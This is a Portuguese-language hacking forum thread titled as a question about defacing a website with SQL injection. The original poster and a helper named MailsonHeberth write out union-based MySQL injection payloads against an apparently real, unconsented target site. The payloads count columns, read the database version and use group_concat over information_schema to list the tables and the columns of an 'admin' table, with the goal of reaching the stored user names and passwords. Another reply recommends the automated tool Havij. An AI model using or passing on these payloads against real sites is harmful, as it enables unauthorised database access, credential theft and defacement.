Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Dufiva sobre deface usando SQLInjection

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Tempo
  • Show
Clear All
new posts
Anterior template Avançar
  • Font Size
    #1

    Dufiva sobre deface usando SQLInjection

    Olá Pessoal .. Estou começando agor ameus estudos com SqlInjection. Ja tenho uma noçao muito boa de sql e programação web. Estou seguindo aqui um tutorial. Es os passos que eu fiz:

    Site:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Descobrindo o numero de colunas da tabela:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... order by 1,2,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45 -- "SEM ERRO"
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... order by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45 -- "COM ERRO"
    Logo a tabela possui 45 colunas ...
    Descobrindo a versao do Base de Dados:
    Citação:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45 --
    Resultado: 5.0.92-community-log
    O problema é justamente nesse ponto. Após essa etapa, estou tentando conseguir o nome da tabela usando a seguinte sql:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45 from information_schema.tables where table_schema = '5.0.92-community-log' limit 0,1--
    Mas o browser exibe o seguinte erro:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'5.0.92-community-log\' limit 0,1--' at line 1
    Já tentei usar algumas variações para ver se conseguia resolver esse erro mas o mesmo persiste.. T.T

    Alguem saberia me dizer o que fazer para passar dessa etapa?
    ... Sempre fui meu próprio mestre. E também era meu aluno favorito ...


    sigpic
    Tags: Nenhum(a)
    • Top
  • Font Size
    #2
    mano você pode estar usando a ferramenta "havij" é so procurar no google que nao te erro.é bem facil de usar
    caso tenha duvidas procure no youtube q tem lá,é um otimo scaner =D
    • Top

    Comment

    • Font Size
      #3
      Entao cara. ... conheço o havij, as keria aprender os fundamentos. Ver como as coisas funfa, entende? Gosto de aprender assim, ate mesmo pq n kero mexer na pagina de ninguem, entao n faz sentido eu usar o havij pq n estaria aprendendo nada com isso ...

      Mas vlw ai pela sugestao ...
      ... Sempre fui meu próprio mestre. E também era meu aluno favorito ...


      sigpic
      • Top

      Comment

      • Font Size
        #4
        Poxa . . 51 visitas e ninguém sabe como resolver esse problema... ¬¬

        Galera se acostuma a usar HAVIJ e se acham grandes hackers, aff...

        É uma pena...
        ... Sempre fui meu próprio mestre. E também era meu aluno favorito ...


        sigpic
        • Top

        Comment

        • Font Size
          #5
          Postado Originalmente por Enkhyl Ver Post
          Poxa . . 51 visitas e ninguém sabe como resolver esse problema... ¬¬

          Galera se acostuma a usar HAVIJ e se acham grandes hackers, aff...

          É uma pena...
          não manjo deface broder se não te ajudava, eu acho que esta fazendo as perguntas certas para as pessoas erradas... nada contra nosso amigo ali que tentou ajudar, até por que ele concerteza fez o que a maioria não faz, que é se importar com a sua causa.

          Da uma olhada aqui mesmo na área de deface e veja quem são as pessoas, que mais ajudam e tente mandar umas MPs pra elas, acredito que conseguirar sanar suas duvidas bem rápido.
          foi mal não poder ajudar broder.
          Não Acha Estranha Essa Frase:
          Eu Sou Hacker e Uso Windows XP!

          Use Débian, Aprenda Slackware e Brinque Muito Com Back|Track


          Fã ->Nickguitar.dll


          Quer ajudar nossso fórum e não sabe como?
          Então click na imagem e ajude-nos com os links off
          • Top

          Comment

          • Font Size
            #6
            Enkhyl,
            meu caro, minha pergunta a você é, porque não usou o comando group concat?
            E na minha opinião, @@version é inutil. (pessoas vão discordar, mas saibam que essa é minha opinião.)
            Agora vamos la onde você parou:

            Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... order by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45--
            Obs: Deixe o valor da ID negativa usando NULL ou - (sinal de menos).
            Continuando:
            Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45--
            Vamos usar o 5 para o comando group concat
            Agora:
            Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union select 1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 from+information_schema.tables+where+table_schema= database()--
            Vai informar todas as tabelas e acredito que a que você procura é a "admin".
            Agora vamos saber as colunas contidas na tabela "admin":
            Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union select 1,2,3,4,group_concat(column_name),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 from+information_schema.columns+where+table_schema =database()--
            Acredito agora que a que você procura seja:
            Usuario e Senha...

            Daqui em diante é com você e com os lammers que iram usar desse meu esclarecimento a você para hackear esse site. Noobs.

            Boa sorte nos seus estudos.
            Abraço

            Lembrando:
            MSN/E-mail: Mailson.Heberth@guiadohacker.com.br




            "Antes de conseguir você tem que acreditar."

            • Top

            Comment

            • Font Size
              #7
              Postado Originalmente por Lord Beni-Aretz Ver Post
              não manjo deface broder se não te ajudava, eu acho que esta fazendo as perguntas certas para as pessoas erradas... nada contra nosso amigo ali que tentou ajudar, até por que ele concerteza fez o que a maioria não faz, que é se importar com a sua causa.

              Da uma olhada aqui mesmo na área de deface e veja quem são as pessoas, que mais ajudam e tente mandar umas MPs pra elas, acredito que conseguirar sanar suas duvidas bem rápido.
              foi mal não poder ajudar broder.
              Vlw Lord Beni... Como mencionei no post nao tenho intenção de fazer defacer nesse site não. Meu intuito é aprender mais sobre as falhas. Estou no final da facul e pretendo fazer minha monografia sobre segurança WEB. Mas vlw aew brother, mesmo sem ajudar. O que vale é a intenção.
              ... Sempre fui meu próprio mestre. E também era meu aluno favorito ...


              sigpic
              • Top

              Comment

              • Font Size
                #8
                Postado Originalmente por MailsonHeberth Ver Post
                Enkhyl,
                meu caro, minha pergunta a você é, porque não usou o comando group concat?
                E na minha opinião, @@version é inutil. (pessoas vão discordar, mas saibam que essa é minha opinião.)
                Agora vamos la onde você parou:



                Obs: Deixe o valor da ID negativa usando NULL ou - (sinal de menos).
                Continuando:

                Vamos usar o 5 para o comando group concat
                Agora:


                Vai informar todas as tabelas e acredito que a que você procura é a "admin".
                Agora vamos saber as colunas contidas na tabela "admin":


                Acredito agora que a que você procura seja:
                Usuario e Senha...

                Daqui em diante é com você e com os lammers que iram usar desse meu esclarecimento a você para hackear esse site. Noobs.

                Boa sorte nos seus estudos.
                Abraço

                Lembrando:
                MSN/E-mail: Mailson.Heberth@guiadohacker.com.br
                Aew MailsonHeberth, Blza ...

                Cara, com esse comando group_concat funfou legal. Tbm dei uma olhada na documentacao do MySql sobre INFORMATION_SCHEMA e deu pra fazer mais uns testes bacana aquí. . Vlw mesmo aew pela ajuda brow!! Vou continuar meus estudos por aquí ...
                ... Sempre fui meu próprio mestre. E também era meu aluno favorito ...


                sigpic
                • Top

                Comment

                Anterior template Avançar
                X
                Working...
                X